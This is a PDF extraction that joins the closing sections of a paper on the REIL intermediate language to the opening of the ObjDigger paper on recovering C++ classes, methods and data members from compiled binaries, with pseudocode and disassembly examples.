guaranteed that the value of the reduced register equals the
value of the original register. In many situations overflow-
ing high bits will be truncated and lost. This is perfectlyacceptable though because this is used in many different sit-
uations already, for example when writing the 33-bit wide
result of an addition of two 32-bit values back to a 32-bit
register while truncating the overflow. Right now this trun-
cation is done using an AND instruction. In the future the
reduce instruction might make things semantically clearer.
The number of operand types might also be increased in
the future. As soon as FPU instructions are supported by
the REIL translators it is necessary to add single-precision
FPU operands and double-precision FPU operands. An-
other example are certain architectures like PowerPC where
registers can be addressed not by name but by an index into
the register bank. These instructions can not be translated
to REIL yet because REIL does not know an operand type
like register index.
7. RELATEDWORK
The use of intermediate languages for code analysis is
nothing new. In fact all serious compilers use some kind
of intermediate language during the optimization phase of
their generated code (see GCC for example). Creating inter-
mediate representations for disassembled assembly code in
the context of security analysis is not nearly as widespread.
Nevertheless there are a few approaches which are notewor-
thy.
At the hack.lu conference 2008 Mihai Chiriac of the anti-
virus software company BitDefender presented an interme-
diate language that he used to speed up the emulation of
obfuscated malware programs [1]. The intermediate lan-
guage he presented is structurally close to REIL. Like REIL,
his language has a very reduced instruction set where every
instruction has exactly one effect on the global state. Fur-
thermore his virtual architecture has an infinite number of
virtual registers and a fully emulated memory.
An open-source implementation of an intermediate lan-
guage specifically made for reverse engineering and stat-
ically analyzing binary code is the ELIR language of the
ERESI project6. Like REIL, the goal of the ELIR interme-
diate language is simplified platform-independent reasoning
about assembly code by providing an intermediate language
that makes the effects of all native assembly operations ex-
plicit. An overview of the ELIR language was given in Julien
Vanegue’s EKOPARTY 2008 talk Static binary analysis with
a domain specific language [2].
A commercial use of intermediate language recovery from
disassembled code in the context of security analysis is IDA
Pro and Hex-Rays. IDA Pro is the industry standard disas-
sembler for many platforms and Hex-Rays is a decompiler
plugin for IDA Pro. The Hex-Rays decompiler uses an in-
termediate language representation (IR) of the underlying
disassembled code to analyze and optimize the disassembled
code and to decompile it into a C-style high-level language.
As shown in Ilfak Guilfanov’s Black Hat 2008 presentation
Decompilers and Beyond [3] [4], the intermediate representa-
tion used by Hex-Rays is significantly different from REIL.
There are more instructions in the Hex-Rays IR and they
do not obey the single-responsibility rule for avoiding side
effects. Other differences include the distinction between in -
teger literals and pointers to code which is present in the
Hex-Rays IR but not in REIL and features like the option
to address basic blocks instead of addresses in jump instruc-
6http://www.eresi-project.org
tions. Another striking difference that can be seen directly
when looking at code snippets of REIL and the Hex-Rays IR
is that REIL uses way more temporary registers to translate
a typical piece of code.
Another implementation of an intermediate language was
created by GrammaTech in their CodeSurfer/X86 product.
While not publicly available at this point, several whitepa-
pers have been released about CodeSurfer/X86 (for example
see [5] or [6]). Unfortunately these whitepapers focus on the
results of certain static analysis algorithms with CodeSurfer/X86
instead of their intermediate language so it is unclear at this
point how similar this language is to REIL.
As part of AbsInt, an analysis framework specifically suited
for statically analyzing embedded system code, Saarland
University developed the intermediate language CRL2. Like
REIL, CRL2 is generated by transforming the assembly code
of a disassembled input program. Nevertheless the similar-
ities to REIL end at this point. CRL2 was specifically de-
veloped for detailed control flow analysis and as a result of
that, CRL2 code is very complex due to a large number of
annotations that are relevant for control flow. Examples of
generated CRL2 code can be found at [7].
8. CONCLUSIONS
Using the information presented in this paper it is possi-
ble to write a complete implementation of the Reverse En-
gineering Intermediate Language REIL that can be used for
static code analysis of disassembled assembly code. We have
already created a commercial implementation of REIL in
our product BinNavi and we have successfully written sev-
eral simple static code analysis algorithms. Thanks to REIL
these algorithms work platform-independently on x86 code,
on PowerPC, and on ARM code.
9. REFERENCES
[1] Mihai G. Chiriac. Anti Virus 2.0 - Compilers in
disguise . hack.lu, October 2008.
[2] Julien Vanegue. Static binary analysis with a domain
specific language. EKOPARTY 2008, October 2008.
[3] Ilfak Guilfanov. Decompilers and beyond. BlackHat
USA 2008, August 2008.
[4] Ilfak Guilfanov. Decompilers and beyond - Whitepaper
. BlackHat USA 2008, August 2008.
[5] Gogul Balakrishnan, Radu Gruian, Thomas Reps, and
Tim Teitelbaum. Codesurfer/x86-a platform for
analyzing x86 executables. In of Lecture Notes in
Computer Science , pages 250–254. Springer, 2005.
[6] T. Reps, G. Balakrishnan, J. Lim, and T. Teitelbaum.
A next-generation platform for analyzing executables.
InIn APLAS , pages 212–229, 2005.
[7] AbsInt Angewandte Informatik GmbH. CRL Version 2
Manual .Recovering C++ Objects From Binaries
Using Inter-Procedural Data-Flow Analysis
Wesley Jin
CMU
wesleyj@andrew.cmu.eduCory Cohen
CERT
cfc@cert.orgJeffrey Gennari
CERT
jsg@cert.org
Charles Hines
CERT
hines@cert.orgSagar Chaki
SEI
chaki@sei.cmu.eduArie Gurfinkel
SEI
arie@sei.cmu.edu
Jeffrey Havrilla
CERT
jsh@cert.orgPriya Narasimhan
CMU
priya@cs.cmu.edu
Abstract
Object-oriented programming complicates the already difficult task
of reverse engineering software, and is being used increasingly
by malware authors. Unlike traditional procedural-style code, re-
verse engineers must understand the complex interactions between
object-oriented methods and the shared data structures with which
they operate on, a tedious manual process.
In this paper, we present a static approach that uses symbolic
execution and inter-procedural data flow analysis to discover ob-
ject instances, data members, and methods of a common class. The
key idea behind our work is to track the propagation and usage of
a unique object instance reference, called a this pointer . Our goal
is to help malware reverse engineers to understand how classes are
laid out and to identify their methods. We have implemented our
approach in a tool called O BJDIGGER , which produced encourag-
ing results when validated on real-world malware samples.
1. Introduction
As malware grows in sophistication, analysts and reverse engineers
are increasingly encountering samples written in code following
the object-oriented (OO) programming model. For those tasked
with analyzing these programs, recovering class information is an
essential but painstaking process. Analysts are often forced to resort
to slow and manual analysis of a large number of methods and data
structures.
Programs that follow a traditional, procedural-based program-
ming model are typically arranged around functions with well-
Permission to make digital or hard copies of all or part of this work for personal or
classroom use is granted without fee provided that copies are not made or distributed
for profit or commercial advantage and that copies bear this notice and the full citation
on the first page. Copyrights for components of this work owned by others than the
author(s) must be honored. Abstracting with credit is permitted. To copy otherwise, or
republish, to post on servers or to redistribute to lists, requires prior specific permission
and/or a fee. Request permissions from permissions@acm.org.
PPREW ’14 , January 25, 2014, San Diego, CA, US.
Copyright is held by the owner/author(s). Publication rights licensed to ACM.
ACM 978-1-4503-2649-0/14/01. . . $15.00.
http://dx.doi.org/10.1145/10.1145/2556464.2556465defined boundaries, inputs, and outputs. They use structures that
support limited operations with simple relationships (e.g., C-style
structs). The clear relationships between procedures make it rela-
tively easy to recover control and data flow even after compilation.
Conversely, the OO programming model is organized around
data structures (i.e. C++ objects) with complex relationships and
interactions. While C++ data structures are easily recognizable in
source code, compilation hides them behind sets of methods with
no obvious organization or relevance to one another. Therefore,
to reverse engineer an OO program, analysts must: (1) determine
related methods that belong to the same class; and (2) understand
how they interact.
To facilitate the recovery of object structures and relationships,
we have developed an approach that leverages the use of the “this
pointer” (hereafter ThisPtr ), a reference assigned to each unique
(up to allocation instruction address) object instance. Specifically,
we use symbolic execution [11] and static inter-procedural data-
flow analysis [9] to track individual ThisPtr propagation and usage
between and within functions.
Although previous authors, most notably Fokin et. al [7][6] and
Sabanal et. al [18], have used ThisPtr tracking for OO reverse
engineering purposes, our work is distinct for two reasons: 1) We
document heuristics for identifying object-oriented methods and
structures expressed as data-flow patterns, which can be detected
in an automated way. Although patterns may vary from compiler
to compiler or from one object to another, the key idea is that each
variant may be captured as a unique pattern. 2) Our approach relies
only on static analysis and symbolic execution. Thus, it has the
ability to recover object-oriented artifacts that may not be created
during execution.
We have implemented our approach on top of the ROSE analysis
framework [15][17]. ROSE provides an infrastructure for disassem-
bly, symbolic execution, control flow analysis, and data flow anal-
ysis. Our tool, O BJDIGGER , aggregates data from object instances
created throughout a binary, compiled with Microsoft’s Visual Stu-
dio C++ (MSVC). It records potential constructors, data members
and methods. Tests against open-source programs, compiled with
MSVC, and real-world malware samples indicate that we are able
to recover this information reasonably accurately. Although our
current implementation is specific to MSVC, our approach could
be extended to others as well.
In summary, the contributions of this paper are:
•We present a purely static approach that uses symbolic execu-
tion and inter-procedural data-flow analysis to track object ref-
erences in binaries, produced by MSVC.
•We provide an implementation capable of analyzing a binary
and producing a list of (1) potential constructors or builders;
(2) methods; (3) data members.
•We present techniques for detecting inheritance relationships
and embedded objects.
•We demonstrate, through experimentation on both open-source
programs and closed source malware, that the techniques de-
scribed in this paper can be practically applied for reverse engi-
neering OO code.
The remainder of this paper is organized as follows. In Sec. 2,
we provide a brief overview of C++ object internals. In Sec. 3,
we formalize our goals and constraints. In Sec. 4, we provide
definitions for data structures crucial to our approach. In Sec. 5,
we describe our approach. In Sec. 6, we describe experiments
conducted using our implementation. In Sec. 6.1.2, we describe
limitations in our current work and our plans to address them in the
future. In Sec. 7, we review related work. In Sec. 8, we conclude.
2. Implementing Object Oriented C++ Features
In this section, we provide a basic overview of object-oriented C++
concepts. For a more detailed discussion, we direct interested read-
ers to Gray [8]. Although this paper focuses on code following
MSVC’s __ thiscall convention, objects produced by other compil-
ers follow similar patterns. Our discussion focuses on the example
presented in Fig. 1.
When objects are created, the compiler allocates space in mem-
ory for each class instance. The amount of space allocated is based
on the number and size of data members and possibly padding for
alignment. Fig. 2 illustrates the layout of this memory region for
Sub,Add andAdd1 , as generated1by MSVC. Every instantiated
object is referenced by a pointer to its start in memory; this refer-
ence is commonly referred to the ThisPtr .
The ThisPtr is maintained for the lifetime of the object. It is
passed amongst methods, and is used for data member accesses
and to make virtual function calls. For example, suppose that tPtr
is a ThisPtr to an instance of Add1 . The memory dereference
[tPtr+12] points at variable one (see Fig. 2), and [tPtr+8]
points at the embedded Subobject inherited from Add.
Only one instance of a function is created by a compiler. How-
ever, many instances of a C++ class may exist. Therefore, the
ThisPtr allows for operations on the data members within a par-
ticular object instance. In MSVC, the ThisPtr is typically passed as
a hidden parameter to OO functions via the ECX register in accor-
dance with the __ thiscall calling convention (more on this later).
For example, the sum() method, depicted in Fig. 3, implements
the __ thiscall calling convention. At 0x401120, the ThisPtr is re-
trieved from ECX . At 0x40112A, the immediate value 1is moved
into the memory location corresponding to ThisPtr plus 12. This
memory location corresponds to the offset of the Add1 class mem-
ber variable one. Therefore, the instruction at 0x40112A corre-
sponds to the high-level assignment one=1 .
Inheritance manifests in memory layouts by embedding an ob-
ject of each superclass inside the object of the subclass (see Fig. 2).
1This output is generated using the -d1reportAllClassLayout flag.class Sub {
private:
int c;
public:
int sub(int a, int b) {
c=a-b;
return c;
}
};
class Add {
protected:
int x;
int y;
Sub b;
public:
Add() {x=0; y=0; }
Add(int q, int e) { x=q; y=e; }
int sum() { return x+y; }
int sub() { return b.sub(x,y); }
};
class Add1: public Add {
public:
int one;
int sum() {
one = 1;
return x+one;
}
Add1(int q) {
x = q;
}
};
Figure 1. Object-oriented code sample.
Dereferences to parent data members consist of addresses com-
posed of the ThisPtr plus offsets into the parent and child objects.
For example, to access the class member variable Add::x from an
Add1 object,Add1 ’sThisPtr is adjusted by an offset to refer to the
embedded Addinstance (zero in this case) and then dereferenced as
needed.
Virtual functions are implemented using virtual function tables
that contain a list of virtual function addresses. The address of
a virtual function table is stored as an implicit data member at
offset zero of the object (i.e., and accessed by reading [thisPtr] ).
Indirect calls to virtual functions are made by dereferencing the
virtual function table and calling the target virtual function.
Fig. 4 illustrates a virtual function call to the second function in
a virtual function table. At address 0x402300, the virtual function
table’s address is moved from offset zero of the class layout into
EAX . At 0x402305, the pointer corresponding to the second func-
tion in the virtual function table is moved into EAX , which is called
in the next instruction.
When an inheritance relationship exists, the child object over-
writes the virtual function table references of its parent (if it has
one) on instantiation to ensure the most specific virtual function ta-
ble is installed at runtime. If there are multiple parents with virtual
functions, the child object has multiple references to distinct virtual
function tables, one per parent. In this arrangement, references to
virtual function pointers are placed at the beginning of each em-
bedded parent object.
class Sub size(4):
+–-
0 | c
+–-
class Add size(12):
+–-
0 | x
4 | y
8 | Sub b
+–-
class Add1 size(16):
+–-
| +–- (base class Add)
0 | | x
4 | | y
8 | | Sub b
| +–-
12| one
+–-
Figure 2. Class layouts for Sub,Add, andAdd1 .
0x401120: mov [esp+4], ecx
0x401125: mov eax, [esp+4]
0x40112A: mov dword ptr [eax+12], 1
0x401131: mov eax, [esp+4]
0x401136: mov eax, [eax]
0x401138: mov ecx, [esp+4]
0x40113D: add eax, [ecx+12]
0x401140: retn
Figure 3. Assembly Code for sum() inAdd1 .
0x402300: mov eax, [ecx]
0x402305: mov eax, [eax+4]
0x40230A: call eax
Figure 4. Virtual function call example.
3. Problem Statement
Given a binary executable compiled from C++ source code without
debugging information, recover the following:
•Unique constructors and builder methods for classes instanti-
ated
•Methods associated with object instances
•Location and size of data members used in these methods.
Goals and Assumptions. The goal of this work is to expedite
the recovery of object-oriented structures in compiled executables.
We aim to aid program understanding such that reverse engineers
and malware analysts are able to quickly identify when objects and
their data members are being used.
However, we do not seek to recover the original source code
of classes for two reasons. First, recovering source might not al-
ways be possible, because compilation is not an injective mapping.
Different sources can be compiled to produce the same binary, so
identifying the original source code is impossible in general. Sec-
ond, from the malware analysts’ point of view, it is more important
to understand the details of the compiled code (e.g., method rela-
tionships and class layouts) than high-level abstractions.4. Definitions
In this section, we review basic definitions and abstractions from
data-flow analysis, used in the next section. For additional informa-
tion, we direct the reader to work by Kiss, Jász, and Gyimóthy [12].
A computer system can be defined as C=⟨P, M, R⟩, where P
is a program; MandRare memory locations and registers that
are available for use by P. Each program is composed of a set
of functions, F, which can be further divided into sequences of
instructions (i.e.,∀f∈F, f=⟨i0, i1, i2, ...⟩). Let Ibe the set of
instructions, and Vbe the set of values they manipulate.
Instructions read from and write to parts of MandR. Let
Use : I↦→2(V×(M∪R))be a mapping such that Use(i)is the
set of all pairs⟨v, a⟩, where vis the value read by iandais either
a memory address in Mor a register in Rthat stores v:
Use(i) ={
⟨v, a⟩|a∈M∪R, iv←a}
Simply stated, Use(i)is a data structure that maps instructions
to values read in particular registers and memory locations. Sim-
ilarly, let Def : I↦→2(V×(M∪R))be a mapping between an in-
struction and the locations it writes to:
Def(i) ={
⟨v, a⟩|a∈M∪R, iv→a}
An instruction is said to depend on another instruction, if it
reads/uses a value that has been set by the other. We define the
function DepOn to be a mapping between an instruction iand the
set of triplets⟨v, a, j⟩, where vis the value written to the register
or memory location abyj.
DepOn( i) ={⟨v, a, j⟩|⟨v, a⟩∈Use(i)∩Def(j)}
Simply stated, DepOn adds to the data provided by Use by
providing information about the instruction responsible for defining
the value that was read. Alternatively, the first instruction is said to
be a dependent of the second. DepOf is the inverse of DepOn :
DepOf( j) ={⟨v, a, i⟩|⟨v, a⟩∈Use(i)∩Def(j)}
Finally, we define the notion of data flow order. Consider a
function Xthat calls three others: A,B, andC, such that Bcalls
Djust before returning. Furthermore, suppose that Xpasses each
method the value v. Written in flow order, [A, B, D, C ], implies
that 1) A, B, D andCcontain instructions that all use v(i.e.,
instructions in A, B, C andDshare a reaching definition ofv),
2) Instructions in Adominate the instructions in B, D andC.
Instructions in Bdominate those in CandD, and so forth. (i.e.,
Given a control-flow graph containing X, A, B, C andD, and
taking the first instruction in Xas the starting node, every path
to the start from the instructions in B, C andDmust go through
the instructions in A. Every path from the instructions in CandD
must go through those in AandB, and so forth.)
5. Approach
Our approach consists of a preliminary stage and iterative anal-
ysis passes. We begin by disassembling binaries using the ROSE
framework, and use data and control flow analysis to build the
Use,Def,DepOn andDepOf maps. These data structures are
then used to identify object-oriented structures. ROSE provides the
x86 instruction semantics and symbolic emulation infrastructure re-
quired for this analysis.
The key idea behind identifying OO structures is to track the
propagation of unique (up to allocation sites) ThisPtr instances
within and between functions. We begin by identifying the set
of functions ( FM) that possibly follow the __ thiscall convention.
Next, using heuristics about known heap allocation functions such
as the new() operator and stack allocation patterns, we identify
points at which a ThisPtr is created. We track these pointers to
functions in FMusing inter-procedural data flow analysis. Depend-
ing on data flow order, we mark methods as either constructors
or member/inherited functions. Within these functions, we look
for data transfers to and from memory addresses based off of the
ThisPtr . Depending on the offsets from the ThisPtr and the size
of dereferences, we recover the size and position of data members.
OBJDIGGER uses the ROSE framework to perform control-flow and
dominator analysis.
5.1 Data and Control Flow Analysis
To construct the four maps described above, we implemented the
well known work-list algorithm [3, 10, 12] for data-flow analysis.
Our algorithm is shown in Procedure buildDependencies() . It
maintains a list of symbolic expressions (called states ) that capture
the contents of registers and memory after each basic block2is
executed. For each basic block B, and for each instruction iofBin
flow order, the algorithm: (i) symbolically executes i; (ii) updates
the register and memory contents of B’s state with the result r;
and (iii) adds ito the list of “modifiers” of r. This list records the
addresses of all instructions that have contributed to the value up
to this point. For example, processing the instruction add [eax],
5, located at address 0x00405630, updates the memory contents at
the address pointed to by EAX with 5, and adds 0x00405630 to
the value’s list of modifiers. Therefore, when a different instruction
reading this same memory location is processed later (i.e., cmp
[EAX], 0 ), a dependency relationship with the addis established
by reading the list of modifiers.
The state of each basic block, before any instructions are ex-
ecuted, is composed of the ‘merged’ states of each of the block’s
predecessors. In more detail, if control-flow can reach a basic block
from multiple locations, the contents of registers and memory at
block entry may have different symbolic values and modifiers, de-
pending on the specific path taken. Thus, the merged state com-
bines the information from each possible entry path by performing
a union across all possible entry states. Explicitly, if the contents
of a register or memory location is the same in two different entry
states, the symbolic value for that location in the merged state is the
same. If they are different, the merged state reflects that the value
is unknown, and the resulting list of modifiers is the combination
of the lists from each entry state.
The state of each basic block, after all instructions are executed,
is compared with the its previous state in states . If any of the
registers or memory contents have changed, states is updated and
all the block’s successors (those that the block can flow into) are
marked for processing. The algorithm terminates when the state of
all blocks stop changing.
5.2 Identifying __ thiscall Functions
Most methods follow the __ thiscall calling convention. When
identifying data members and inheritance, we restrict ourselves
to such functions, and thus our first step is to identify them. Note
that the steps outlined here are not precise enough to distinguish
between __ thiscall and some instances of __ fastcall ,[5] (i.e., a
more complete algorithm would also need to verify that EDX is not
being used to pass parameters.) However, it is a cheap way to elim-
inate many functions that cannot be methods from further analysis,
thereby improving the overall efficiency of our approach.
A key trait of __ thiscall in MSVC is ThisPtr is passed as a
parameter in the ECX register3. Exploiting this feature, we find
__thiscall methods as follows:
2A sequence of instructions with one entry and one exit.
3http://msdn.microsoft.com/library/ek8tkfbw(v=vs.80)
.aspxProcedure buildDependencies()
Input :Func : A binary function composed of assembly
instructions
Input :EntryState : Symbolic state of system, storing register
and memory contents, upon function entry
Result :Uses ,Defs ,DepsOn andDepsOf are populated for
each instruction
1foreachblock∈getBasicBlocks( Func)do
2states [block ]←initSymbolicState() ;
3queue [block ]←true;
4changed←true;
5whilechanged do
6foreachblock∈getBasicBlocks( Func)do
7 ifqueue [block ]then
8 ifisFirstBlock( block)then
9curstate←EntryState ;
10 else
11 foreachpred∈getPredecessorBlocks( block)do
12 curstate←mergeStates( curstate ,states [pred]);
13 foreachinstr∈getInstructions( block)do
14curstate←symbolicExec( instr ,curstate);
15 foreachaloc∈getRegsAndMemRead( instr)do
16 symval←getRegOrMemValue( aloc,curstate);
17 Uses[instr]←⟨symval ,aloc⟩;
18 foreachdefiner∈getModifierList( symval)do
19 DepsOn [instr]←⟨symval ,aloc,definer⟩;
20 DepsOf [definer ]←⟨symval ,aloc,instr⟩;
21 foreachaloc∈getRegsAndMemWritten( instr)do
22 symval←getRegOrMemValue( aloc,curstate);
23 Defs[instr]←⟨symval ,aloc⟩;
24 if notregsAndMemEqual( curstate ,states [block ])then
25changed←true;
26 foreachsuccessor∈getSuccessorBlocks( block)
do
27 queue [successor ]←true;
28states [block ]←curstate ;
29queue [block ]←false ;
We examine each method within a binary, f∈F, and look
for those that contain instructions that use ECX , whose value has
been defined externally to the function. We examine DepOn and
look for an instruction, i, that maps to the tuple ⟨∗, ECX, j⟩,
where jis an instruction that belongs to a different function than i,
and ‘*’ matches an arbitrary value.) Therefore, the set of methods
following __ thiscall is:
FM←{f|∃i∈f∃j̸∈f⟨∗, ECX, j⟩∈DepOn( i)}
Our algorithm for identifying __ thiscall methods is shown
in Procedure findThisCall() . It generates a set containing
pairs, each containing the __ thiscall method, and the first in-
struction within that method to read ECX . In the rest of this pa-
per, by a __ thiscall method, we mean a method identified by
findThisCall() .
Procedure findThisCall()
Input :Funcs : set of functions from the executable
Input :DepsOn : the dependent-on map
Result :ThisCalls : set of pairs⟨func,instr⟩, wherefunc
follows __ thiscall andinstr is the first instruction in
func that reads ECX
1ThisCalls←nil;
2foreachfunc∈Funcs do
3foreachinstr∈getInstructions( func)do
4 foreach⟨value,aloc,depinst⟩∈DepsOn [instr]do
5deffunc←getFunction( depinst);
6 ifaloc=ECX and func̸=deffunc then
7ThisCalls←ThisCalls∪⟨func,instr⟩;
8 Repeat at Line 2 ;
9returnThisCalls
5.3 Identifying Object Instances and Methods
Once potential __ thiscall methods have been identified, the next
step is to group them into object instances by finding those that
share a common ThisPtr . Recall, the ThisPtr is a reference to an
object instance. Object-oriented methods are passed these point-
ers, so that they know which object instance they are operating
on, and they use the pointer to obtain member values and identify
virtual methods. Therefore, we first identify a potential ThisPtr ,
which points to the stack or the heap. Next, from the data struc-
tures constructed earlier in buildDependencies() , we look for
those object-oriented methods that have been passed this particular
pointer in ECX .
Identifying ThisPtr creation follows a similar pattern for both
the stack and the heap. Heap space is obtained using functions such
as MSVC’s new() operator. Stack space is allocated upon function
invocation in the function prologue4. Thelea instruction is often
used subsequently to load references to portions of this space. In
the remainder of this section, we describe how we track a heap-
addressed ThisPtr to object-oriented methods. Tracking a stack-
addressed ThisPtr is very similar, except the process begins at an
leainstruction.
We are able to identify calls to new() , either by parsing the bi-
nary’s import section or from fingerprints/hashes of known5new()
implementations. Once a call to new() has been identified, we iter-
ate through each __ thiscall method, and attempt to identify those
that contain an instruction that uses this new() ’s returned value.
To identify methods belonging to an object created on the heap,
we do the following for each function that calls new() :
1. We retrieve the ThisPtr by identifying the first instruction, j,
that reads EAX after a call to new() .6The symbolic value of
theThisPtr is found from Use(j), corresponding to the pair
⟨thisPtrFromNew, EAX ⟩.
See Procedure findReturnValueOfNew() .
4Typically push ebp; mov ebp, esp; sub esp, X; where X is the
number of bytes allocated in the current stack frame.
5We hash the bytes of unique new() implementations across different ver-
sions of the Visual Studio compiler. We attempt to identify functions that
match these signatures within a binary.
6Functions such as new() typically return their result in the register EAX .2. We then iterate through each __ thiscall method, called in the
same function that calls new() , looking for those that contain an
instruction, i, that reads ECX with a matching value.
Simply stated, we look for __ thiscall methods that are passed
values of ECX that match the symbolic value in EAX , immediately
following a call to new() . Or more formally:
objectMethods ={f∈FM|∃i∈FM
⟨thisPtrFromNew, ECX ⟩∈Use(i)∧i∈f}
where fis a __ thiscall method, iis an instruction in f, and
thisPtrFromNew is defined above. Also see Procedure
findObjectMethodsFromNew() .
0x401008: call new
0x40100D: mov [ebp-4], eax
0x401010: mov ecx, [ebp-4]
0x401021: call constructor
0x401024: ...
0x401026: push param1_offset
0x40102D: push param2_offset
0x401030: mov ecx, [ebp-4]
0x401033: call method
Figure 5. Heap object construction and method call example.
Fig. 5 illustrates these concepts. The call to new() at 0x401008
allocates space on the heap. The ThisPtr , referring to this region,
is returned in EAX and the instruction at 0x40100D saves it into
a temporary variable. Next, this ThisPtr is transferred to the ECX
register prior to the call to the constructor at 0x401021 and to the
method call at 0x401033. Since constructor andmethod share a
ThisPtr , they are methods belonging to the same class.
Procedure findReturnValueOfNew()
Input :NewCaller : a function that calls new()
Input :NewAddresses : set of addresses of new() functions
Input :Uses : the Uses map built by buildDependencies()
Result :ThisPtr : the symbolic value returned by a new() call
1found←false ;
2foreachinstr∈getInstructions( NewCaller )do
3iffound =false then
4 ifgetInstructionType( instr)=x86_call then
5 ifgetCallDest( instr)∈NewAddresses then
6found←true ;// found the call to new
7else
8 foreach⟨ThisPtr ,aloc⟩∈Uses[instr]do
9 ifaloc=EAX then
10 returnThisPtr ;// return the symbolic value
11return failure ; // not usually reached
In a similar fashion, we identify objects created on the stack
by identifying lea instructions, l, that reference locally allo-
cated stack space. The value of ThisPtr is found from the pair
⟨thisPtr, REG⟩∈Def(l), where REG is the first parameter of
thelea instruction. The pointer is tracked to __ thiscall methods
in the same way as on the heap.
Identifying which methods are likely constructors is compli-
cated by several factors. Constructors are required to return a
ThisPtr , which distinguishes them from many, but not all con-
ventional methods. If the class uses virtual functions, initialization
Procedure findObjectMethodsFromNew()
Input :NewCaller : a function that calls new()
Input :ThisCalls : set of functions from findThisCall()
Input :Uses : the Uses map built by buildDependencies()
Result :ObjectMethods : set of functions sharing a common
ThisPtr
1ObjectMethods←nil;
2thisptr←findReturnValueOfNew( NewCaller );
// Get list of OO calls from this function
3OurCalls←ThisCalls∩getCalls( NewCaller );
4foreach⟨func,instr⟩∈OurCalls do
5foreach⟨symval ,aloc⟩∈Uses[instr]do
6 ifaloc=ECX and symval =thisptr then
7ObjectMethods←ObjectMethods∪func;
8returnObjectMethods
of the virtual function table pointers can be used to reliably iden-
tify constructors, but virtual functions are not present in all classes.
Another common heuristic is that constructors are always called
first after space is allocated for the object. This heuristic fails when
compiler optimization has resulted in the constructor being inlined
following the allocation. We chose to identify constructors as the
first method called following allocation of the object if it returned
the same ThisPtr that was passed as a parameter. This algorithm
erroneously identifies some functions as constructors; for exam-
ple, builder/factory methods can closely resemble constructors at
the binary level. However, because these types of methods may
be indistinguishable from constructors in the binary we have not
counted this as an error. This heuristic also misses some legitimate
constructors, for example in methods that construct other types of
objects.
5.4 Data Members
Once related __ thiscall methods have been associated with unique
object instances, we process each one to retrieve data members. Re-
call that the ThisPtr points into the memory region allocated for an
object. Therefore, by finding memory dereferences that use ThisPtr
and extracting their offset into this area and size, we identify the lo-
cation and width of the data member in the class layout.
Specifically, we identify the first instruction, j, in the function
to read ECX . We retrieve the value of the ThisPtr from the pair
⟨thisPtr, ECX⟩ ∈ Use(j). We then iterate through all of the
other instructions that dereference memory, i, looking for a pair
⟨∗, thisPtr + offset⟩ ∈ Use(i). The algorithm is given more
formally in Procedure findDataMembers() , which produces a
mapping, MemberMap , between a __ thiscall method and a set of
data members discovered at a particular offset, represented by the
pair⟨offset ,size⟩.
Fig. 6 illustrates the use of ThisPtr for accessing a data mem-
ber. The ThisPtr is moved from ECX toEAX at 0x401104 and
0x401107. The data variable located at memory address ThisPtr
plus 0xC is transferred to EAX at 0x40110A. Therefore, we de-
termine that there is a data member at offset twelve in this class’
layout. Since the size of the dereference is 32-bit, we can assume
that a variable, of at least that size, exists at that particular offset.
5.5 Virtual Function Tables
Objects that have virtual function tables initialize the memory at
ThisPtr (zero offset) with the address of the table. This memory0x401100: push ebp
0x401101: mov ebp, esp
0x401103: push ecx
0x401104: mov [ebp-4], ecx
0x401107: mov eax, [ebp-4]
0x40110A: mov eax, [eax+0Ch]
0x40110D: add eax, 1
0x401110: mov esp, ebp
0x401112: pop ebp
0x401113: retn
Figure 6. Data member discovery example.
Procedure findDataMembers()
Input :ThisCalls : set of functions from findThisCall()
Input :Uses : the Uses map built by buildDependencies()
Result :MemberMap : mapping from functions to pairs
⟨offset ,size⟩describing data members
1MemberMap←nil;
2foreach⟨func,instr⟩∈ThisCalls do
3members←nil;
4foreach⟨thisptr ,aloc⟩∈Uses[instr]do
5 ifaloc=ECX then
6 foreachuinstr∈getInstructions( func)do
7 ifinstr̸=uinstr then
8⟨symval ,ualoc⟩←Uses[uinstr ];
9 ifisMemReadType (ualoc )then
10 offset←thisptr−symval ;
11 ifisConstant( offset)then
12 size←getReadSize( uinstr ,ualoc);
13 members←members∪⟨offset ,size⟩;
14 break ; // done with this function
15MemberMap [func]←members ;
16returnMemberMap
write occurs within a constructor and typically takes on the form
ofmov [reg], vtableAddr wherereg contains the value of a
ThisPtr . Therefore, if we find such instructions within constructors
identified previously, we record the written constants as potential
virtual function table addresses (i.e., ⟨vtableAddr, thisPtr ⟩ ∈
Def(i)). We then identify calls made to entries within this table by
examining the dependents of the movinstruction, i. In more detail,
we find the set of instructions, Q:
Q={q|⟨vtableAddr, thisPtr, q ⟩∈DepOf( i)}
where Qcontains the set of instructions that read the ThisPtr
from the address initialized by the movinstruction. Using symbolic
execution, we follow the flow of the pointer from this instruction
to acall instruction. We record the branch target and offset of the
call destination from ThisPtr as an entry at the given offset within
the virtual table.
5.6 Inheritance and Embedded Objects
Although our current implementation does not fully support inher-
itance detection, we describe our current progress in this area.
Inheritance relationships can be determined by analyzing con-
structors. When a class inherits from a parent, the constructors of
the subclass call the parent’s constructors. Specifically, the sub-
classes pass their ThisPtr to the parents’ constructors. In the case
of single inheritance, the subclass constructor passes the ThisPtr
directly (the memory address is exactly equal to ThisPtr with no
offset). In the case of multiple inheritance, the subclass passes the
pointer plus the offset at which the parent is located in the class
layout.
Unfortunately, this behavior is also observed when an object
contains embedded objects. Therefore, in order to distinguish be-
tween embedded objects and inheritance, we need additional dis-
criminators. One reliable method would be to check if the subclass
overwrites the virtual table address of its parent in its constructors.
As mentioned earlier, classes in general, and the parent class in this
case, are not required to contain virtual functions.
In summary, to identify inheritance relationships, we could: (1)
retrieve all cross-references (calls out of the function) from con-
structors to other constructors; (2) compare the values of ECX at
the beginning of each function; a constructor that calls other con-
structors that share a common ECX value (possibly plus some con-
stant) indicates either an inheritance relationship or an embedded
object; (3) check to see if the caller overwrites, the address passed
to the called constructors. Recall, the pointer to the virtual table
is typically located at offset zero within a class layout. Therefore,
if a constructor writes to a memory address, that corresponds to
aThisPtr passed to another constructor, with a pointer to a new
virtual table, we can label the other constructor as a parent. If we
cannot find such an overwrite, it is possible that the constructor is
instantiating an embedded object within the class. See Procedure
lookForInheritance() .
0x401104: mov [ebp-4], ecx
0x401107: mov ecx, [ebp-4]
0x40110A: call sub_4010C0
0x40110F: mov ecx, [ebp-4]
0x401112: add ecx, 10h
0x401115: call sub_401080
0x40111A: mov eax, [ebp-4]
0x40111D: mov dword ptr [eax], 0x40816C
0x401123: mov ecx, [ebp-4]
0x401126: mov dword ptr [ecx+10h], 0x40817C
Figure 7. Example constructor with multiple inheritance.
